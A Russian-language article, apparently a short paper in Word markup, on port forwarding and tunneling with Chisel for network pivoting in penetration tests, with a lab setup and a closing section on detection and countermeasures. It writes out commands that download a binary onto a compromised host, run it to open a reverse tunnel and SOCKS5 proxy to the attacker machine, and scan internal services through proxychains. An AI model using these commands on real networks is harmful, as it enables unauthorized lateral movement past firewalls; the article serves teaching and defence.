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Проброс портов и построение туннелей с помощью Chisel:</w:t>
        <w:br/>
        <w:t>методы перемещения по сети и меры обнаружения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техник туннелирования в тестировании защищённости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Chisel — быстрый TCP/UDP-туннель с открытым исходным кодом, передаваемый поверх HTTP и защищённый по SSH, применяемый для обхода сетевых ограничений и доступа к внутренним службам. Описаны клиент-серверная архитектура, порядок развёртывания и основные техники: локальный (обратный) проброс портов и динамическое перенаправление через SOCKS5-прокси в сочетании с proxychains. Основное внимание уделено признакам такой активности и мерам её обнаружения и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проброс портов; туннелирование; Chisel; SOCKS5; proxychains; перемещение по сети (pivoting); обнаружение угроз.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Проброс портов представляет собой перенаправление сетевого запроса с одной пары «адрес–порт» на другую при прохождении пакетов через сетевой шлюз (межсетевой экран или маршрутизатор). В тестировании защищённости эта техника необходима для доступа к службам во внутренних сегментах сети. Chisel — инструмент на языке Go, реализующий быстрый TCP/UDP-туннель поверх HTTP с шифрованием SSH, что позволяет проходить межсетевые экраны, пропускающие HTTP-трафик. Цель работы — систематизировать техники туннелирования Chisel и сформулировать меры их обнаружения с позиции защитника.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>2. Архитектура</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Для построения туннеля требуются два компонента: сервер, запускаемый на машине исследователя, и клиент, запускаемый на скомпрометированном узле. В качестве транспорта используется HTTP, а конфиденциальность обеспечивается шифрованием SSH. Такой подход позволяет туннелю проходить межсетевые экраны, разрешающие веб-трафик. Нотация направления: запись R:локальный_порт:localhost:удалённый_порт задаёт обратный (reverse) проброс, при котором запросы следуют по маршруту: исследователь → сервер Chisel → клиент Chisel → внутренняя служба.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>3. Испытательный стенд</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Стенд моделирует типовую внутреннюю оценку: атакующий узел Kali Linux (192.168.1.205); скомпрометированный узел Linux (192.168.1.15); внутренняя цель (192.168.146.128), доступная только со скомпрометированного узла. Доступ к промежуточному узлу предполагается уже полученным (например, по SSH), состояние соединений проверяется командой netstat -antp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>4. Развёртывание</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.1. Установка на Kali Linux из репозитория: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apt install chisel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.2. Сборка из исходного кода на целевом узле (флаги -s -w уменьшают размер бинарного файла):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git clone https://github.com/jpillora/chisel.git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apt install golang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go build -ldflags="-s -w"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Готовые сборки также доступны в разделе релизов проекта.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>5. Локальный (обратный) проброс портов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>5.1. Запуск сервера на стороне исследователя (режим обратного туннеля):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chisel server -p 5000 --reverse</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>5.2. Доставка бинарного файла на цель и запуск клиента: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# на стороне исследователя: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python3 -m http.server 80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# на целевом узле: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wget 192.168.1.205/chisel_1.7.7_linux_amd64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chmod 777 chisel_1.7.7_linux_amd64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./chisel_1.7.7_linux_amd64 client 192.168.1.205:5000 R:4444:localhost:8080</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>В результате внутренняя служба на порту 8080 становится доступна на узле исследователя по адресу http://127.0.0.1:4444. Указание сетевого интерфейса в качестве локального порта (например, R:8888:localhost:8080) делает службу доступной и по внешнему адресу http://192.168.1.205:8888.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>6. Динамическое перенаправление через SOCKS5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Когда локальный проброс отдельных портов неприменим из-за сегментации или множества подсетей, используется SOCKS5-прокси, пробрасывающий произвольные соединения. Запуск сервера с поддержкой SOCKS5 и подключение клиента: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chisel server -p 8000 --socks5 --reverse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./chisel client 192.168.1.205:8000 R:socks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>7. Настройка proxychains и доступ к службам</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>7.1. В файле /etc/proxychains4.conf отключается запись SOCKS4 и добавляется SOCKS5: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socks5 127.0.0.1 1080</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Браузер при необходимости настраивается на SOCKS5 (127.0.0.1:1080). 7.2. Через proxychains становятся доступны протоколы без встроенной поддержки прокси (сканирование, Telnet, FTP, VNC):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proxychains nc -zvn 192.168.146.128 21 23 5900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proxychains telnet 192.168.146.128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proxychains ftp 192.168.146.128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proxychains vncviewer 192.168.146.128</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>8. Обнаружение и меры противодействия</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Поскольку Chisel маскирует туннель под HTTP-трафик, защита строится эшелонированно. Сетевой уровень: ограничение исходящего трафика по белому списку и блокировка нетипичных исходящих соединений с внешних узлов; инспекция TLS/HTTP и выявление аномальных долгоживущих соединений и WebSocket-сессий, характерных для Chisel; сегментация сети и узловые межсетевые экраны для предотвращения перемещения с промежуточных узлов. Узловой уровень: контроль запуска неизвестных бинарных файлов (EDR, разрешённые списки приложений), мониторинг изменения прав (chmod) и загрузки исполняемых файлов (wget/curl), выявление процессов, открывающих локальные прослушивающие порты. Организационный уровень: принцип минимальных привилегий, журналирование и корреляция событий в SIEM, регулярный аудит разрешённых исходящих направлений.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>9. Заключение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>В работе систематизированы техники туннелирования Chisel: локальный (обратный) проброс портов пригоден для одношаговых сценариев, тогда как SOCKS5-прокси обеспечивает многошаговое перемещение между сегментами, а proxychains расширяет применимость на протоколы без встроенной поддержки прокси. С точки зрения защиты ключевыми являются контроль исходящего трафика, инспекция HTTP/TLS, сегментация сети и узловой контроль запуска бинарных файлов. Эффективность защиты определяется сочетанием сетевых и узловых мер.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jpillora. Chisel: a fast TCP/UDP tunnel over HTTP. GitHub repository.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. MITRE ATT&amp;CK. Command and Control: Protocol Tunneling (T1572).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. MITRE ATT&amp;CK. Lateral Movement: Internal Proxy (T1090.001) and Multi-hop Proxy (T1090.003).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. OWASP Foundation. Network Segmentation and Egress Filtering guidance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5. proxychains-ng project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